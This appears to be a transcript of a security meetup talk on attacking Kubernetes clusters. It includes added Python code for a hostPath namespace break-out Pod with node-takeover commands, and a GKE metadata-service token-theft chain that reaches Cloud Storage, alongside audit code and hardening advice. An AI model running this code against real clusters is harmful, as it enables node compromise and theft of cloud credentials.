Slide 1

Kubernetes From an Attacker's Perspective
Abhisek Datta
Head, Security Products, Appsecco

Slide 2

OWASP Bay Area Meetup Group https://www.meetup.com/Bay-Area-OWASP/

Slide 3

About Me – Abhisek Datta
• Head, Security Products (appsecco.com)
  • Application & Cloud Security
  • Kubernetes Cluster Security Assessments
• TechWing @ null0x00 (null.co.in)
  • An Open Security Community
• Security Researcher
  • Discovered vulnerabilities in enterprise software and credited with CVE
• Open Source Contributor
  • https://github.com/abhisek
@abh1sek on Twitter

Slide 4

1. A quick introduction to Kubernetes
2. Kubernetes from an Attacker's Perspective
3. Attacking Kubernetes (Scenarios)
Key Take Away

Slide 5

My Environment

I have a cluster set up on Google Kubernetes Engine (GKE) for the demo.

Slide 6

What is Kubernetes?

Slide 7

What is Kubernetes?
https://www.youtube.com/watch?v=4ht22ReBjno

Slide 8

Kubernetes: The Container Orchestration Platform
https://v1-16.docs.kubernetes.io/docs/concepts/overview/components/

Slide 9

Kubernetes from an Attacker's Perspective

Slide 10

Simple Threat Model

WHO ARE THE ATTACKERS?
WHAT CAN THEY ATTACK?
HOW CAN THEY ATTACK?

Slide 11

Who are the attackers?

1. External attackers – No access to cluster
2. Internal attackers – Attacker in a Pod
3. Privileged attackers – Some access to cluster

Slide 12

What can they attack?

• Etcd Database
• Secrets
• Credentials
• Certificates
• PKI Information
• Volumes (Storage)
• Container Images (maybe)
• Network Services
• Etc.

Slide 13

How can they attack?

1. What is exposed outside the cluster?
2. What is exposed inside the cluster?
3. What is exposed in the cloud environment?

Slide 14

Kubernetes: From an Attacker's Perspective
https://v1-16.docs.kubernetes.io/docs/concepts/overview/components/

Slide 15

External Exposure

Master
• OS Services
• API Server
• Other master components

Node(s)
• OS Services
• Kubelet
• Container Runtimes
• Network Services
• Storage Volumes
• Apps

Attack surface on each component: Security Vulnerability, Configuration Weaknesses

Slide 16

Internal Exposure – Attacker in a Pod

Everything available to an External Attacker + many more:
• Service Account Privileges
• Pod Network
• Service Network
• Volumes
• Configs & Secrets
• Environmental Information
• Internal Trust

Slide 17

Cloud Exposure

1. Identity & Access Management
2. Meta-data Service
3. Storage
   1. Object & Block storage services
   2. Container Registry
4. Other cloud services

Slide 18

Attacking Kubernetes Cluster

Slide 19

Attacking Kubernetes

1. Namespace break-out using insecure hostPath volume mount
2. Lateral movement in the cloud – Exploit GKE instance meta-data endpoint service

Slide 20

Hands-on Attacks Demo

Slide 21

Namespace Break-out using hostPath Volume Mount

Assume any one of the following:
• I am a developer and have access to CRUD Pods in the developers namespace
• I am an attacker and have just gained access to a Pod running a CI/CD engine that needs to create more Pods to run build jobs

Bottom line:
• We can create Pods, but we are (hopefully) tightly restricted to a single namespace

Slide 22

Namespace Break-out using hostPath Volume Mount

• Kubernetes supports mounting a hostPath volume inside a container
• This is known and documented to be insecure... but who cares?
• We use this feature to access the underlying Node's filesystem from our Pod
• We can then interact with the Docker daemon on the host (the node's filesystem and Docker socket are not namespace-scoped, so every container on that node is reachable, whatever namespace it belongs to)
• Usually it's game over by now
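The following is an added example, not code from the talk: it builds the hostPath break-out Pod the slide describes (a namespace-bound "create pods" permission is all it needs) and pairs it with an audit helper that scans `kubectl get pods -A -o json` output for the same pattern. The namespace, image and the list of paths rated "critical" are assumptions for illustration; the sample Pod list is constructed inline.

```python
"""Added example, not code from the slides: build the hostPath break-out Pod the
talk describes and audit a cluster's Pod list for the same pattern."""
import json

NAMESPACE = "developers"   # assumption: the only namespace we may create Pods in
IMAGE = "alpine:3.18"      # assumption: any image with a shell will do

# Node paths that hand over the node outright once mounted into a container.
# The list is a judgement call (assumption), not something the slides enumerate.
CRITICAL_HOST_PATHS = ("/var/run/docker.sock", "/var/run", "/run",
                       "/var/lib/kubelet", "/etc/kubernetes", "/root")


def hostpath_breakout_pod(name="escape", namespace=NAMESPACE, image=IMAGE):
    """Pod that mounts the node's root filesystem at /host.

    kubectl accepts JSON as well as YAML, so json.dumps() of this dict can be
    piped straight into `kubectl apply -f -`. Nothing here is privileged or
    cluster-scoped; a namespace-bound "create pods" permission is enough.
    """
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name, "namespace": namespace},
        "spec": {
            "containers": [{
                "name": "shell",
                "image": image,
                "command": ["sleep", "infinity"],   # stay up for kubectl exec
                "volumeMounts": [{"name": "host-root", "mountPath": "/host"}],
            }],
            "volumes": [{
                "name": "host-root",
                # The insecure part: any node path, here the whole root
                "hostPath": {"path": "/", "type": "Directory"},
            }],
        },
    }


def _severity(path):
    """Rate a hostPath: root or a known-dangerous subtree is critical."""
    norm = "/" + path.strip("/")            # "/var/run/" -> "/var/run"
    if norm == "/":
        return "critical"
    for crit in CRITICAL_HOST_PATHS:
        if norm == crit or norm.startswith(crit + "/"):
            return "critical"
    return "warning"                        # any hostPath deserves a look


def audit_pods(pod_list):
    """Scan `kubectl get pods -A -o json` output for hostPath volumes."""
    findings = []
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata", {})
        ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        for vol in pod.get("spec", {}).get("volumes", []):
            host_path = vol.get("hostPath")
            if host_path:
                path = host_path.get("path", "")
                findings.append({"pod": ref, "path": path,
                                 "severity": _severity(path)})
    return findings


# Constructed sample list: a benign Pod with an emptyDir plus the escape Pod.
SAMPLE_POD_LIST = {
    "apiVersion": "v1",
    "kind": "List",
    "items": [
        {"apiVersion": "v1", "kind": "Pod",
         "metadata": {"name": "web", "namespace": "developers"},
         "spec": {"containers": [{"name": "web", "image": "nginx"}],
                  "volumes": [{"name": "tmp", "emptyDir": {}}]}},
        hostpath_breakout_pod(),
    ],
}

if __name__ == "__main__":
    print(json.dumps(hostpath_breakout_pod(), indent=2))
    for finding in audit_pods(SAMPLE_POD_LIST):
        print(f"{finding['severity']:8} {finding['pod']} mounts hostPath "
              f"{finding['path']}")
```

Once the Pod is running, `kubectl -n developers exec -it escape -- sh` followed by `chroot /host` puts you on the node itself; from there the node's Docker socket (`/var/run/docker.sock`, i.e. `/host/var/run/docker.sock` from inside the container) lists and execs into every container on that node, regardless of namespace. The defensive counterpart is to refuse hostPath at admission: the Pod Security Standards at `baseline` or above forbid hostPath volumes, and the audit function above is the quick way to find Pods that already slipped through.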

Slide 23

Lateral Movement in the Cloud – Exploiting Instance Meta-data on GKE

Assume:
• We have access to any Pod in a Kubernetes cluster running in Google Kubernetes Engine (GKE)

Why?
• We can access the default instance metadata service available to instances in Google Cloud
• We want to break out of the cluster and access other cloud resources

Slide 24

Lateral Movement in the Cloud – Exploiting Instance Meta-data on GKE

• Generate an access token using the metadata service
• Check the token's scopes
• Access cloud resources using the generated access token
  • Cloud Storage
  • Container Registry
  • Etc.

CIS GKE Benchmark Recommendation 6.2.1: Prefer not running GKE clusters using the Compute Engine default service account
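The three steps on this slide, as an added example that is not code from the talk. The metadata paths, the `Metadata-Flavor: Google` header, the tokeninfo endpoint and the Cloud Storage bucket-list URL are Google's real interfaces; the HTTP call is injectable so the chain can also be run offline against constructed responses (the `fake_gke_metadata` function, its token, project name, scopes and bucket names are all made up for the example, and which scopes count as "broad" is a judgement call).

```python
"""Added example, not code from the slides: the metadata-service chain from the
slide (token, scopes, cloud resources). The HTTP call is injectable so the same
code runs offline against constructed responses."""
import json
import urllib.request

METADATA = "http://metadata.google.internal/computeMetadata/v1"
TOKENINFO = "https://oauth2.googleapis.com/tokeninfo"
STORAGE_API = "https://storage.googleapis.com/storage/v1/b"

# Scopes that let a stolen token reach far beyond the cluster. Which scopes
# count as "broad" is a judgement call (assumption), not from the slides.
BROAD_SCOPES = {
    "https://www.googleapis.com/auth/cloud-platform",
    "https://www.googleapis.com/auth/compute",
    "https://www.googleapis.com/auth/devstorage.read_write",
    "https://www.googleapis.com/auth/devstorage.full_control",
}


def http_get(url, headers=None):
    """Real GET; returns the body as text."""
    req = urllib.request.Request(url, headers=headers or {})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()


def fetch_token(get=http_get):
    """Step 1: the node service account's OAuth token from the metadata server.
    The Metadata-Flavor header is mandatory; without it the server refuses."""
    body = get(f"{METADATA}/instance/service-accounts/default/token",
               {"Metadata-Flavor": "Google"})
    return json.loads(body)["access_token"]


def project_id(get=http_get):
    """The project the node lives in, also served by the metadata server."""
    return get(f"{METADATA}/project/project-id", {"Metadata-Flavor": "Google"})


def token_scopes(token, get=http_get):
    """Step 2: ask Google's tokeninfo endpoint what the token is good for."""
    body = get(f"{TOKENINFO}?access_token={token}")
    return set(json.loads(body).get("scope", "").split())


def list_buckets(token, project, get=http_get):
    """Step 3: use the token outside the cluster, here against Cloud Storage."""
    body = get(f"{STORAGE_API}?project={project}",
               {"Authorization": f"Bearer {token}"})
    return [b["name"] for b in json.loads(body).get("items", [])]


def lateral_movement(get=http_get):
    """Run the whole chain and report what the token gives us."""
    token = fetch_token(get)
    scopes = token_scopes(token, get)
    project = project_id(get)
    return {
        "project": project,
        "broad_scopes": sorted(scopes & BROAD_SCOPES),
        "buckets": list_buckets(token, project, get),
    }


def fake_gke_metadata(url, headers=None):
    """Constructed responses mimicking a node on the Compute Engine default
    service account with the cloud-platform scope (all values assumed)."""
    headers = headers or {}
    if url.startswith(METADATA):
        if headers.get("Metadata-Flavor") != "Google":
            raise PermissionError("metadata server requires Metadata-Flavor: Google")
        if url.endswith("/token"):
            return json.dumps({"access_token": "ya29.FAKE", "expires_in": 3599,
                               "token_type": "Bearer"})
        if url.endswith("/project-id"):
            return "demo-project"
    if url.startswith(TOKENINFO):
        return json.dumps({"scope": "https://www.googleapis.com/auth/cloud-platform "
                                    "https://www.googleapis.com/auth/devstorage.read_only"})
    if url.startswith(STORAGE_API):
        if headers.get("Authorization") != "Bearer ya29.FAKE":
            raise PermissionError("401 from storage API")
        return json.dumps({"items": [{"name": "demo-project-backups"},
                                     {"name": "demo-project-tfstate"}]})
    raise ValueError(f"unexpected URL: {url}")


if __name__ == "__main__":
    # Swap fake_gke_metadata for http_get to run inside a real GKE Pod.
    print(json.dumps(lateral_movement(fake_gke_metadata), indent=2))
```

Inside a real Pod the same thing is a pair of `curl -H 'Metadata-Flavor: Google'` calls; the only requirement is that the Pod can reach the metadata server, which the default GKE network policy allows. A token bearing `cloud-platform` is effectively the node's full cloud identity, which is why the CIS recommendation on the slide matters: a dedicated node service account with minimal scopes bounds what an attacker in a Pod can reach, and GKE Workload Identity goes further by giving each Pod the Google identity mapped to its own Kubernetes service account instead of the node's.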

Slide 25

Kubernetes Attack Matrix
https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Slide 26

More Resources

• The Illustrated Children's Guide to Kubernetes
  • https://www.cncf.io/the-childrens-illustrated-guide-to-kubernetes/
• Get started with learning Docker (Containers)
  • https://www.katacoda.com/courses/docker
• Get started with learning Kubernetes using Katacoda
  • https://www.katacoda.com/courses/kubernetes
• Attacking and Auditing Docker Containers and Kubernetes Clusters – Our recently released training material
  • https://bit.ly/k8s-pentesting

Slide 27

(Relevant) CIS Benchmarks

• https://www.cisecurity.org/benchmark/docker/
• https://www.cisecurity.org/benchmark/kubernetes/
• https://cloud.google.com/kubernetes-engine/docs/concepts/cis-benchmarks
• https://www.cisecurity.org/benchmark/ubuntu_linux/

Slide 28

Questions?

[email protected]
https://appsecco.com
@abh1sek
github.com/abhisek

That's all for now..